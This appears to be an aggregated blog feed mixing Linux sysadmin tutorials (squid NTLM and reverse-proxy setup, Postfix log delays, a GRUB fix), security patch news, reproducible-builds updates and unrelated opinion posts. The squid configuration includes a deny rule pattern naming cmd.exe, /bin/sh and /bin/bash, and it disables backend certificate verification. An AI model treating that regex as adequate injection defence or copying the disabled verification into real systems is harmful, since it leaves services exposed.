--krb5realm=TEST.LAN --smbservers=pdc.test.lan --smbworkgroup=TESTLAN \
--enablewinbind --enablewinbindauth --smbsecurity=ads --smbrealm=TEST.LAN \
--smbidmapuid="16777216-33554431" --smbidmapgid="16777216-33554431" --winbindseparator="+" \
--winbindtemplateshell="/bin/false" --enablewinbindusedefaultdomain --disablewinbindoffline \
--winbindjoin=administrator --disablewins --disablecache --enablelocauthorize --updateall

NOTE: Replace pdc.test.lan with the FQDN of your DC server, TESTLAN with your domain, TEST.LAN with the full name of the domain/realm, and make sure you set ‘--winbindjoin’ with a domain admin.

If that succeeds, let’s test it:

# wbinfo -u
# wbinfo -g

If you are able to enumerate your Active Directory Groups and Users, everything is working.

Next, let’s test that we can authenticate with winbind:

# wbinfo -a

E.G:

# wbinfo -a testuser
Enter testuser's password:
plaintext password authentication succeeded
Enter testuser's password:
challenge/response password authentication succeeded

Great, we have been added to the domain, so now we can setup squid for NTLM authentication.

SQUID Configuration
Squid comes with its own NTLM authentication binary (/usr/lib64/squid/ntlm_smb_lm_auth) which uses winbind, but as of Samba 3.x, Samba bundles its own, which is the recommended binary to use (according to the squid and samba projects). So the binary we use comes from the samba-winbind package we installed earlier:

/usr/bin/ntlm_auth
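
If you want to sanity-check the helper itself before touching squid, it can be run by hand; the username, password and output below are purely illustrative:

# /usr/bin/ntlm_auth --username=testuser --password='secret'
NT_STATUS_OK: Success (0x0)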

Add the following configuration elements to the squid.conf to enable NTLM authentication:

#NTLM
auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp
auth_param ntlm children 5
auth_param ntlm keep_alive on

acl ntlm proxy_auth REQUIRED
http_access allow ntlm

NOTE: The above allows anyone access as long as they authenticate themselves via NTLM; you could use further ACLs to restrict this, as in the sketch below.
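
For instance, replacing the ‘http_access allow ntlm’ line above with something like the following (the subnet is only an example) would also require clients to come from your local network:

acl officenet src 192.168.1.0/24
http_access allow ntlm officenet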

The ntlm_auth binary has other switches that might be of use, such as restricting users by group membership:

auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp --require-membership-of=EXAMPLE+ADGROUP

Before we are complete there is one more thing we need to do: for squid to be allowed to use winbind, the squid user (which was created when the squid package was installed) needs to be a member of the wbpriv group:

gpasswd -a squid wbpriv

IMPORTANT!
NTLM authentication WILL FAIL if you have “cache_effective_group squid” set; if you do, then remove it! This overrides the effective group, so squid isn’t seen as part of the ‘wbpriv’ group, which breaks authentication!!!
/IMPORTANT!

Add squid to the runlevels and start it:

# chkconfig squid on
# /etc/init.d/squid start

Troubleshooting
Make sure you open the port in iptables; if squid is listening on 3128, then:

# iptables -I INPUT 1 -p tcp --dport 3128 -j ACCEPT
# /etc/init.d/iptables save

NOTE: The ‘/etc/init.d/iptables save’ command saves the current running configuration so the new rule will be applied on reboot.

Happy squid-ing.

Planet Linux AustraliaMatthew Oliver: Reverse proxy using squid + Redirection

Squid – Reverse Proxy

In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client as though they originated from the reverse proxy itself. While a forward proxy is usually situated between the client application (such as a web browser) and the server(s) hosting the desired resources, a reverse proxy is usually situated closer to the server(s) and will only return a configured set of resources.

See: http://en.wikipedia.org/wiki/Reverse_proxy

Configuration

Squid should already be installed; if not, then install it:

yum install squid

Then we edit squid config:


vim /etc/squid/squid.conf

Then we add the following to the top of the file:

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

cache_effective_user squid
cache_effective_group squid

cache_peer 1.2.3.4 parent 80 0 no-query originserver login=PASS name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

Now I’ll walk us through the above configuration.

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

This sets the HTTP and HTTPS ports squid is listening on. Note the cert options for HTTPS: we can get clients to use HTTPS up to the proxy and an unencrypted link for the last hop if we want, which is handy if for some reason the backend server doesn’t support HTTPS.
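
If you don’t already have a certificate for squid to present on port 443, a self-signed pair matching the paths above can be generated with openssl (the CN is just an example; a properly signed certificate is obviously preferable):

openssl req -new -x509 -nodes -days 365 \
	-subj "/CN=site2.anotherexample.lan" \
	-keyout /etc/squid/localhost.key -out /etc/squid/localhost.crt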


cache_effective_user squid
cache_effective_group squid

Set the effective user and group for squid.. this may not be required, but doesn’t hurt.


cache_peer 1.2.3.4 parent 80 0 no-query originserver name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

This is the magic: the first two lines tell squid which peer to reverse proxy for and what port to use. Note that if you use SSL, ‘sslflags=DONT_VERIFY_PEER’ is useful; otherwise, if you’re using a self-signed cert on the backend, you’ll get certificate errors.

IMPORTANT: If you want to allow HTTP authentication (auth handled by the web server, such as htaccess) then you need to add ‘login=PASS’, otherwise the credentials are treated as authentication to squid itself rather than being passed through to the HTTP server.

The last two lines reference the first two and tell squid which domains map to which peer, so when someone connects to squid asking for one of those domains, it knows where to go and what to cache.


acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

NOTE: The acl line has been wrapped over two lines here; it should all be on one line, followed by the http_access line.
These lines define some bad requests to which we deny access; this is to help prevent SQL injection and other hack attempts.

That’s it; after a (re)start of squid, it will be reverse proxying the domains.
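
On the init-script based setup used in this post, that would be something like:

/etc/init.d/squid restart
# or, to re-read the config without a full restart:
squid -k reconfigure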

Redirect to SSL

We had a requirement to automatically redirect to HTTPS if someone came in on HTTP. Squid allows redirecting in a variety of ways: you can write a redirect script and get squid to use it, but there is a simpler way, using only squid internals and ACLs.

Add the following to the entries added in the last section:


acl port80 myport 80
acl site1 dstdomain site1.example.lan
http_access deny port80 site1
deny_info https://site1.example.lan/ site1

acl site2 dstdomain site2.anotherexample.lan
http_access deny port80 site2
deny_info https://site2.anotherexample.lan/ site2

We create an ACL for squid’s port 80 and then one for the domain we want to redirect. We then use “http_access deny” to cause squid to deny access to that domain coming in on port 80 (HTTP). This deny is caught by the deny_info, which redirects the request to HTTPS.

The order of the ACLs used in the http_access and the deny_info is important. Squid only remembers the last ACL evaluated by an http_access rule and will look for a corresponding deny_info matched to that ACL. So make sure the last ACL on the http_access line matches the ACL used in the deny_info statement!

NOTE: See http://www.squid-cache.org/Doc/config/deny_info/

Appendix

The following is the configuration all put together now.

Reverse proxy + redirection:

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

cache_effective_user squid
cache_effective_group squid

cache_peer 1.2.3.4 parent 80 0 no-query originserver login=PASS name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

acl port80 myport 80
acl site1 dstdomain site1.example.lan
http_access deny port80 site1
deny_info https://site1.example.lan/ site1

acl site2 dstdomain site2.anotherexample.lan
http_access deny port80 site2
deny_info https://site2.anotherexample.lan/ site2

Planet Linux AustraliaMatthew Oliver: Posfix – Making sense of delays in mail

The maillog

The maillog is easy enough to follow, but understanding what the delay and delays numbers mean can really help you see what is going on!
A standard email entry in postfix looks like:

Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=0.49, delays=0.2/0/0.04/0.25, dsn=2.0.0, status=sent

Pretty straightforward: date, the email’s identifier in the mailq (34A1B160852B), recipient, and which server the email is being sent to (relay). It is the delay and delays values I’d like to talk about.

Delay and Delays
If we take a look at the example email from above:

Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=0.49, delays=0.2/0/0.04/0.25, dsn=2.0.0, status=sent

The delay parameter (delay=0.49) is fairly self-explanatory: it is the total amount of time this email (34A1B160852B) has been on this server. But what is the delays parameter all about?

delays=0.2/0/0.04/0.25

NOTE: Numbers smaller than 0.01 seconds are truncated to 0, to reduce the noise level in the logfile.

You might have guessed it is a breakdown of the total delay, but what does each number represent?

Well from the release notes we get:

delays=a/b/c/d:
a=time before queue manager, including message transmission;
b=time in queue manager;
c=connection setup time including DNS, HELO and TLS;
d=message transmission time.

Therefore, looking at our example:

  • a (0.2): The time before getting to the queue manager, so the time it took to be transmitted onto the mail server and into postfix.
  • b (0): The time in queue manager, so this email didn’t hit the queues, so it was emailed straight away.
  • c (0.04): The time it took to set up a connection with the destination mail relay.
  • d (0.25): The time it took to transmit the email to the destination mail relay.

However, if the email is deferred, then when delivery is attempted again:

Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=82, delays=0.25/0/0.5/81, dsn=4.4.2, status=deferred (lost connection with mx1.example.lan[1.2.3.4] while sending end of data -- message may be sent more than once)

Jan 10 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=1092, delays=1091/0.2/0.8/0.25, dsn=2.0.0, status=sent

This time the first entry shows how long it took for the destination mail relay to time out and close the connection:

delays=0.25/0/0.5/81
Therefore: 81 seconds.

The email was deferred, then about 15 minutes later another attempt is made (1009 seconds: the new ‘a’ value of 1091 minus the 82-second total delay of the last attempt).
This time the delay is a lot larger, as the total time this email has spent on the server is a lot longer.

delay=1092, delays=1091/0.2/0.8/0.25

What is interesting though is that the value of ‘a’ is now 1091, which means that when an email is resent, the ‘a’ value in the breakdown also includes the amount of time this email has already spent on the system (before this attempt).

So there you go, those delays values are rather interesting and can really help you work out where bottlenecks lie on your system. In the above case we obviously had some problem communicating with the destination mail relay, but it worked the second time, so it isn’t a problem with our system… or so I’d like to think.
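
If you want a rough feel for which stage usually dominates, here is a purely illustrative one-liner that averages each delays component across a maillog (adjust the log path to suit your system):

grep ' delays=' /var/log/maillog | sed 's/.*delays=\([^,]*\),.*/\1/' | \
awk -F/ '{a+=$1; b+=$2; c+=$3; d+=$4; n++}
	END {if (n) printf "avg a=%.2f b=%.2f c=%.2f d=%.2f (n=%d)\n", a/n, b/n, c/n, d/n, n}'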

Planet Linux AustraliaMatthew Oliver: Use xmllint and vim to format xml documents

If you want vim to nicely format an XML file (and a xena file in this example, 2nd line) then add this to your ~/.vimrc file:
" Format *.xml and *.xena files by sending them to xmllint
au FileType xml exe ":silent 1,$!xmllint --format --recover - 2>/dev/null"
au FileType xena exe ":silent 1,$!xmllint --format --recover - 2>/dev/null"

This uses the xmllint command to format the XML file; useful on XML docs that aren’t nicely formatted on disk.
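
The same xmllint invocation works outside vim too, e.g. to tidy up a file from the shell:

xmllint --format --recover input.xml > input-formatted.xml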

Planet Linux AustraliaMatthew Oliver: Debian 6 GNU/KFreeBSD Grub problems on VirtualBox

Debian 6 was released the other day; with this release they not only released the usual Linux kernel version but now support a FreeBSD kernel as well!
So I decided to install it under VirtualBox and check it out…

The install process went smoothly until I got to the end when it was installing and setting up grub2. It installed ok on the MBR but got an error in the installer while trying to set it up. I jumped into the console to take a look around.

I started off trying to run the update-grub command which fails silently (checking $? shows the return code of 1). On closer inspection I noticed the command created an incomplete grub config named /boot/grub/grub.cfg.new

So all we need to do is finish off this config file. Jump back into the installer and select “Continue without boot loader”; this will pop up a message about what you must set the root partition to when you do set up a boot loader, so take note of it. Mine was /dev/ad0s5.

OK, with that info we can finish off our config file. Firstly, let’s copy the incomplete one into place:
cp /boot/grub/grub.cfg.new /boot/grub/grub.cfg

Now my /boot/grub/grub.cfg ended like:
### BEGIN /etc/grub.d/10_kfreebsd ###
menuentry 'Debian GNU/kFreeBSD, with kFreeBSD 8.1-1-amd64' --class debian --class gnu-kfreebsd --class gnu --class os {
insmod part_msdos
insmod ext2


set root='(hd0,1)'
search --no-floppy --fs-uuid --set dac05f8a-2746-4feb-a29d-31baea1ce751
echo 'Loading kernel of FreeBSD 8.1-1-amd64 ...'
kfreebsd /kfreebsd-8.1-1-amd64.gz

So I needed to add the following to finish it off (note: I’ll repeat that last section in full, with my additions):
### BEGIN /etc/grub.d/10_kfreebsd ###
menuentry 'Debian GNU/kFreeBSD, with kFreeBSD 8.1-1-amd64' --class debian --class gnu-kfreebsd --class gnu --class os {
insmod part_msdos
insmod ext2
insmod ufs2


set root='(hd0,1)'
search --no-floppy --fs-uuid --set dac05f8a-2746-4feb-a29d-31baea1ce751
echo 'Loading kernel of FreeBSD 8.1-1-amd64 ...'
kfreebsd /kfreebsd-8.1-1-amd64.gz
set kFreeBSD.vfs.root.mountfrom=ufs:/dev/ad0s5
set kFreeBSD.vfs.root.mountfrom.options=rw
}

Note: My root filesystem was UFS, thus the ‘ufs:/dev/ad0s5’ in the mountfrom option.

That’s it, your Debian GNU/kFreeBSD should now boot successfully :)

Planet Linux AustraliaHamish Taylor: The woeful state of communications in Australia’s capital city

For those who may not know, I recently moved from Melbourne, Victoria to Canberra, Australian Capital Territory (ACT) and am now living in a house in the inner north-west. Of course, being a geek, I wanted to get the internet connected as soon as possible! After such a smooth transition I’d expected some problems and this is where they all cropped up.

In Melbourne I had an Internode ADSL connection and before I moved I called them up to relocate this service. This, of course, relied on getting an active Telstra line at the new house. I knew it would take a bit of time to relocate the service, so in the interim I bought a Telstra wi-fi internet device. This is actually a ZTE MF30 and supports up to 5 connections via wi-fi, so I can get both my iPhone and laptop on at the same time. Quite simply, this device is brilliant at what it does and I couldn’t be happier with it.

So, at the moment I’m online via the Telstra device, which is just as well really, as I soon encounter communication issue number 1: Optus.

It appears that Optus have a woeful network in Canberra. I have an iPhone 3GS, which I know can only use 850MHz and 2100MHz 3G networks. Optus uses 900MHz and 2100MHz for their 3G, so the iPhone will only work in Optus 2100MHz coverage. In Melbourne I never had a problem getting on the internet at good speeds.

When I looked at the Optus coverage maps for the ACT and clicked on “3G Single band” (the 2100MHz network coverage), they showed the inner north-west being well covered. It really isn’t. Both from home and at work in Belconnen, I can barely get two bars of GSM phone signal. The connectivity is so bad that I can barely make phone calls and send SMSs. Occasionally, I get the “Searching…” message which tells me that it has completely lost GSM connectivity. This never happened in Melbourne, where I had 4-5 bars of signal pretty much all the time.

The 3G connection drops in and out so often that I have to be standing in exactly the right location to be able to access the internet on my iPhone. Even this afternoon in Kingston in the inner south, I wasn’t able to get onto the internet and post to Twitter. I had to use the Telstra device, which hasn’t missed a beat in any location for network connectivity, to establish a connection. This really isn’t good enough for the middle of Canberra. I am seriously considering calling Optus, lodging a complaint and trying to get out of my 2 year contract (which has another 10 months to run), so I can switch over to Telstra. I never thought I’d say this, but I actually want to use a Telstra service!!!

Communications issue number 2: TransACT. From what I can find out TransACT have a cable TV network which also has telephone and internet capabilities. When this network was established about a decade ago, it was revolutionary and competitive. Today the network has been expanded to support ADSL connections, but there is no ability to get a naked service as all connections require an active phone service. Additionally, as a quick look at some of the internet connectivity plans show, after factoring in the required phone service, it is a costly service for below average download allowances.

When I moved into the house, the process of relocating the Internode ADSL service from Melbourne to Canberra triggered a visit from a Telstra technician. However, he wasn’t able to find a physical Telstra line into the house. As this is an older suburb of Canberra, the house should have a Telstra cable. Or rather should have had one, as apparently it is not unknown for TransACT installers to cut the Telstra cables out, saying “You won’t need THAT anymore!”

So now I have to pay for a new cable to be installed from the house to the “Telstra network boundary” (presumably the street or nearest light pole where it can be connected to Telstra’s infrastructure). Then we have to pay again for a new Telstra connection at a cost of $299. Considering that if the Telstra cable had been left in place, the connection cost would be $55, this is turning into quite an expensive proposition just to get a naked DSL service.

All in all I am not impressed with the state of communications in Australia’s capital city, Canberra. All I can say is please, please, please bring on the National Broadband Network (NBN)!

 

 

Planet Linux AustraliaHamish Taylor: Stupidity with passwords

We all know and understand how important passwords are. We all know that we should be using strong passwords.

What’s a strong password? Something that uses:

  • lower case characters
  • UPPER CASE CHARACTERS
  • punctuation, such as !@#$%^&*()<>?”:{}+_
  • and should be 8 characters or longer

So, to put it mildly, it really annoys me when I come across services that don’t allow me to use strong passwords. If I possibly could, I’d boycott these services, but sometimes that’s just not possible.

For example, my internet banking is limited to a password of between 6-8 characters. WTF?! This is hardly a secure password policy!

Another financial service I use is limited to 15 characters and doesn’t allow most of the punctuation set. Why? Is it too difficult to extend your database validation rules to cover all of the character set?

Ironically, I didn’t have a problem with Posterous, Facebook or Twitter (and others) in using properly secure passwords. So, these free services give me a decent level of security, but Australian financial services companies can’t. It’s stupidity in the extreme.

Planet Linux AustraliaHamish Taylor: A call to “standardised user account requirements” arms

We need to have a standard for management of user accounts.

Given the number of high profile companies that have been cracked into lately, I have been going through the process of closing accounts for services I no longer use.

Many of these accounts were established when I was more trusting and included real data. However now, unless I am legally required to, I no longer use my real name or real data.

But I have been bitterly disappointed by the inability of some companies to shut down old accounts. For example, one service told me that “At this time, we do not directly delete user accounts…”. I also couldn’t change my username. Another service emailed my credentials in plain text.

To protect the privacy and security of all users, an enforceable standard needs to be established covering management of user accounts. It needs to be applied across the board to all systems connected to the internet. I know how ridiculous this sounds, and that many sites wouldn’t use it, but high profile services should be able to support something like this.

Included in the standard should be:

  • the ability to completely delete accounts (unless there’s some kind of legislative requirement to keep, and then they should only retain the data that is absolutely necessary)
  • the ability to change all details including usernames
  • a requirement to encrypt and salt the password (that covers the credentials in plain text issue noted above)
  • determine the minimum practicable data set that you need to maintain an account and only ask for that. If there’s no need to retain particular account details, don’t collect them. For example, I’ve never been contacted by phone by any of these companies so why was I forced to enter a phone number?

This is a short list from my frustrations today. Please comment to help me flesh this out with other things that should be done on a properly supported user account management system.

And please let me know of your experiences with companies that were unable to properly protect your privacy and security.

Planet Linux AustraliaHamish Taylor: Back to WordPress!

I’ve given up on Blogger and returned to WordPress. I’ll update the look and feel from the defaults and try to update it a bit more often!

,

Krebs on SecurityAdobe, Microsoft Push Critical Updates

Adobe has issued security updates to fix weaknesses in its PDF Reader and Cold Fusion products, while pointing to an update to be released later this week for its ubiquitous Flash Player browser plugin. Microsoft meanwhile today released 16 update bundles to address dozens of security flaws in Windows, Internet Explorer and related software.

Microsoft’s patch batch includes updates for “zero-day” vulnerabilities (flaws that attackers figure out how to exploit before the software maker does) in Internet Explorer (IE) and in Windows. Half of the 16 patches that Redmond issued today earned its “critical” rating, meaning the vulnerabilities could be exploited remotely with no help from the user, save for perhaps clicking a link, opening a file or visiting a hacked or malicious Web site.

According to security firm Shavlik, two of the Microsoft patches tackle issues that were publicly disclosed prior to today’s updates, including bugs in IE and the Microsoft .NET Framework.

Anytime there’s a .NET Framework update available, I always uncheck those updates to install and then reboot and install the .NET updates; I’ve had too many .NET update failures muddy the process of figuring out which update borked a Windows machine after a batch of patches to do otherwise, but your mileage may vary.

On the Adobe side, the pending Flash update fixes a single vulnerability that apparently is already being exploited in active attacks online. However, Shavlik says there appears to be some confusion about how many bugs are fixed in the Flash update.

“If information gleaned from [Microsoft’s account of the Flash Player update] MS16-064 is accurate, this Zero Day will be accompanied by 23 additional CVEs, with the release expected on May 12th,” Shavlik wrote. “With this in mind, the recommendation is to roll this update out immediately.”


Adobe says the vulnerability is included in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS, and that the flaw will be fixed in a version of Flash to be released May 12.

As far as Flash is concerned, the smartest option is probably to hobble or ditch the program once and for all — and significantly increase the security of your system in the process. I’ve got more on that approach (as well as slightly less radical solutions) in A Month Without Adobe Flash Player.

If you use Adobe Reader to display PDF documents, you’ll need to update that, too. Alternatively, consider switching to another reader that is perhaps less targeted. Adobe Reader comes bundled with a number of third-party software products, but many Windows users may not realize there are alternatives, including some good free ones. For a time I used Foxit Reader, but that program seems to have grown more bloated with each release. My current preference is Sumatra PDF; it is lightweight (about 40 times smaller than Adobe Reader) and quite fast.

Finally, if you run a Web site that in any way relies on Adobe’s Cold Fusion technology, please update your software soon. Cold Fusion vulnerabilities have traditionally been targeted by cyber thieves to compromise countless online shops.

Planet DebianReproducible builds folks: Reproducible builds: week 54 in Stretch cycle

What happened in the Reproducible Builds effort between May 1st and May 7th 2016:

Media coverage

There was a surprising tweet last week: "Props to @FiloSottile for his nifty gvt golang tool. We're using it to get reproducible builds for a Zika & West Nile monitoring project." To our surprise, Kenn confirmed privately that he indeed meant "reproducible builds" as in "bit by bit identical builds". Wow. We're looking forward to learning more details about this; for now we just know that they are doing it basically for software quality reasons.

Two of the four GSoC and Outreachy participants for Reproducible builds posted their introductions to Planet Debian:

Toolchain fixes and other upstream developments

dpkg 1.18.5 was uploaded fixing two bugs relevant to us:

  • #719845 (make the file order within the {data,control}.tar.gz .deb members deterministic)
  • #819194 (add -fdebug-prefix-map to the compilers options)

This upload made it necessary to rebase our dpkg on the version on sid again, which Niko Tyni and Lunar promptly did. Then a few days later 1.18.6 was released to fix a regression in the previous upload, and Niko promptly updated our patched version again. Following this Niko Tyni found #823428: "dpkg: many packages affected by dpkg-source: error: source package uses only weak checksums".

Alexis Bienvenüe worked on tex related packages and SOURCE_DATE_EPOCH:

  • Alexis uploaded texlive-bin to our repo improving the existing patches.
  • pdftex upstream discussion by Alexis Bienvenüe began at the tex-k mailing list to make \today honour SOURCE_DATE_EPOCH. Upstream has already committed enhanced versions of the proposed patches.
  • Similar discussion on the luatex side at luatex mailing list. Upstream is working on it, and already committed some changes.

Emmanuel Bourg uploaded jflex/1.4.3+dfsg-2, which removes timestamps from generated files.

Packages fixed

The following 285 packages have become reproducible due to changes in their build dependencies (mostly from GCC honouring SOURCE_DATE_EPOCH, see the previous week report): 0ad abiword abcm2ps acedb acpica-unix actiona alliance amarok amideco amsynth anjuta aolserver4-nsmysql aolserver4-nsopenssl aolserver4-nssqlite3 apbs aqsis aria2 ascd ascii2binary atheme-services audacity autodocksuite avis awardeco bacula ballerburg bb berusky berusky2 bindechexascii binkd boinc boost1.58 boost1.60 bwctl cairo-dock cd-hit cenon.app chipw ckermit clp clustalo cmatrix coinor-cbc commons-pool cppformat crashmail crrcsim csvimp cyphesis-cpp dact dar darcs darkradiant dcap dia distcc dolphin-emu drumkv1 dtach dune-localfunctions dvbsnoop dvbstreamer eclib ed2k-hash edfbrowser efax-gtk efax exonerate f-irc fakepop fbb filezilla fityk flasm flightgear fluxbox fmit fossil freedink-dfarc freehdl freemedforms-project freeplayer freeradius fxload gdb-arm-none-eabi geany-plugins geany geda-gaf gfm gif2png giflib gifticlib glaurung glusterfs gnokii gnubiff gnugk goaccess gocr goldencheetah gom gopchop gosmore gpsim gputils grcompiler grisbi gtkpod gvpe hardlink haskell-github hashrat hatari herculesstudio hpcc hypre i2util incron infiniband-diags infon ips iptotal ipv6calc iqtree jabber-muc jama jamnntpd janino jcharts joy2key jpilot jumpnbump jvim kanatest kbuild kchmviewer konclude krename kscope kvpnc latexdiff lcrack leocad libace-perl libcaca libcgicc libdap libdbi-drivers libewf libjlayer-java libkcompactdisc liblscp libmp3spi-java libpwiz librecad libspin-java libuninum libzypp lightdm-gtk-greeter lighttpd linpac lookup lz4 lzop maitreya meshlab mgetty mhwaveedit minbif minc-tools moc mrtrix mscompress msort mudlet multiwatch mysecureshell nifticlib nkf noblenote nqc numactl numad octave-optim omega-rpg open-cobol openmama openmprtl openrpt opensm openvpn openvswitch owx pads parsinsert pcb pd-hcs pd-hexloader pd-hid pd-libdir pear-channels pgn-extract phnxdeco php-amqp php-apcu-bc php-apcu php-solr pidgin-librvp plan plymouth pnscan pocketsphinx polygraph portaudio19 postbooks-updater postbooks powertop previsat progressivemauve puredata-import pycurl qjackctl qmidinet qsampler qsopt-ex qsynth qtractor quassel quelcom quickplot qxgedit ratpoison rlpr robojournal samplv1 sanlock saods9 schism scorched3d scummvm-tools sdlbasic sgrep simh sinfo sip-tester sludge sniffit sox spd speex stimfit swarm-cluster synfig synthv1 syslog-ng tart tessa theseus thunar-vcs-plugin ticcutils tickr tilp2 timbl timblserver tkgate transtermhp tstools tvoe ucarp ultracopier undbx uni2ascii uniutils universalindentgui util-vserver uudeview vfu virtualjaguar vmpk voms voxbo vpcs wipe x264 xcfa xfrisk xmorph xmount xyscan yacas yasm z88dk zeal zsync zynaddsubfx

Last week the 1000th bug usertagged "reproducible" was fixed! This means roughly 2 bugs per day since 2015-01-01. Kudos and huge thanks to everyone involved! Please also note: FTBFS packages have not been counted here and there are still 600 open bugs with reproducible patches provided. Please help bringing that number down to 0!

The following packages have become reproducible after being fixed:

Some uploads have fixed some reproducibility issues, but not all of them:

Uploads which fix reproducibility issues, but currently FTBFS:

Patches submitted that have not made their way to the archive yet:

  • #823174 against ros-pluginlib by Daniel Shahaf: use printf instead of echo to fix implementation-specific behavior.
  • #823239 against gspiceui by Alexis Bienvenüe: sort list of object files for linking binary.
  • #823241 against unhide by Alexis Bienvenüe: sort list of source files passed to compiler.
  • #823393 against kdbg by Alexis Bienvenüe: fix changelog encoding and call grep in text mode.
  • #823452 against khronos-opengl-man4 by Daniel Shahaf: sort file lists deterministically.

Package reviews

54 reviews have been added, 6 have been updated and 44 have been removed in this week.

18 FTBFS bugs have been reported by Chris Lamb, James Cowgill and Niko Tyni.

diffoscope development

Thanks to Mattia, diffoscope 52~bpo8+1 is available in jessie-backports now.

tests.reproducible-builds.org

  • All packages from all tested suites have finally been built on i386.
  • Due to GCC supporting SOURCE_DATE_EPOCH sid/armhf has finally reached 20k reproducible packages and sid/amd64 has even reached 21k reproducible packages. (These numbers are about our test setup. The numbers for the Debian archive are still all 0. dpkg and dak need to be fixed to get the numbers above 0.)
  • IRC notifications for non-Debian related jenkins job results go to #reproducible-builds now, while Debian related notifications stay on #debian-reproducible. (h01ger)
  • profitbricks-build4-amd64 has been fully set up now and is running 398 days in the future. Next: update coreboot/OpenWrt/Fedora/Archlinux/FreeBSD/NetBSD scripts to use it. Help (in form of patches to existing shell scripts) very much welcome! (Other help is much welcome (and needed) too, but some things might take longer to merge or explain…)

Misc.

This week's edition was written by Reiner Herrmann, Holger Levsen and Mattia Rizzolo and reviewed by a bunch of Reproducible builds folks on IRC. Mattia also wrote a small ikiwiki macro for this blog to ease linking reproducible issues, packages in the package tracker and bugs in the Debian BTS.

Google Adsense[eBook] Learn how to increase audience engagement

Did you know that roughly 61% of users abandon a site if they don't find what they’re looking for right away?1 As hard as you work to get visitors to your site, you have to work even harder to keep them there.


Unfortunately, there isn’t a clever hack to keeping your users engaged. However, if you understand the intent of your users and provide unique content that’s relevant to their interests, you’ll be on your way to increasing engagement on your site.


Download our guide to audience engagement to learn more about best practices and tips to drive better results for both your users and business. Get your free copy today.



We’d love to hear your feedback on this guide; connect with us on Google+ and Twitter using #AdSenseGuide.




Posted by Jay Castro
from the AdSense team




1) Think with Google, What users want from mobile sites

Sociological Images“I Feel Like” and the New Individualizing of Morality

Historian Molly Worthen is fighting tyranny, specifically the “tyranny of feelings” and the muddle it creates. We don’t realize that our thinking has been enslaved by this tyranny, but alas, we now speak its language. Case in point:

“Personally, I feel like Bernie Sanders is too idealistic,” a Yale student explained to a reporter in Florida.

Why the “linguistic hedging” as Worthen calls it? Why couldn’t the kid just say, “Sanders is too idealistic”? You might think the difference is minor, or perhaps the speaker is reluctant to assert an opinion as though it were fact. Worthen disagrees.

“I feel like” is not a harmless tic. . . . The phrase says a great deal about our muddled ideas about reason, emotion and argument — a muddle that has political consequences.

The phrase “I feel like” is part of a more general evolution in American culture. We think less in terms of morality – society’s standards of right and wrong – and more in terms of individual psychological well-being. The shift from “I think” to “I feel like” echoes an earlier linguistic trend when we gave up terms like “should” or “ought to” in favor of “needs to.” To say, “Kayden, you should be quiet and settle down,” invokes external social rules of morality. But, “Kayden, you need to settle down,” refers to his internal, psychological needs. Be quiet not because it’s good for others but because it’s good for you.


Both “needs to” and “I feel like” began their rise in the late 1970s, but Worthen finds the latter more insidious. “I feel like” defeats rational discussion. You can argue with what someone says about the facts. You can’t argue with what they say about how they feel. Worthen is asserting a clear cause and effect. She quotes Orwell: “If thought corrupts language, language can also corrupt thought.” She has no evidence of this causal relationship, but she cites some linguists who agree. She also quotes Mark Liberman, who is calmer about the whole thing. People know what you mean despite the hedging, just as they know that when you say, “I feel,” it means “I think,” and that you are not speaking about your actual emotions.

The more common “I feel like” becomes, the less importance we may attach to its literal meaning. “I feel like the emotions have long since been mostly bleached out of ‘feel that,’ ” …

Worthen disagrees.  “When new verbal vices become old habits, their power to shape our thought does not diminish.”

“Vices” indeed. Her entire op-ed piece is a good example of the style of moral discourse that she says we have lost. Her stylistic preferences may have something to do with her scholarly ones – she studies conservative Christianity. No “needs to” for her. She closes her sermon with shoulds:

We should not “feel like.” We should argue rationally, feel deeply and take full responsibility for our interaction with the world.

——————————-

Originally posted at Montclair SocioBlog. Graph updated 5/11/16.

Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

(View original at https://thesocietypages.org/socimages)

Chaotic IdealismSchool bus alarms

In the news:
California bill targets school bus deaths
SB1072 would require school buses to have child safety alarms. The alarm sounds when the engine is turned off and requires the bus driver to walk to the back of the bus to turn it off.

Paul Lee was a 19 year old autistic student who died of heatstroke when he was left alone in a school bus on a hot day. It's well-known that babies and pets can die of heatstroke when left in cars, but so do disabled adults--often.

The alarm idea sounds good at first glance, but I don't think these people are thinking it through.

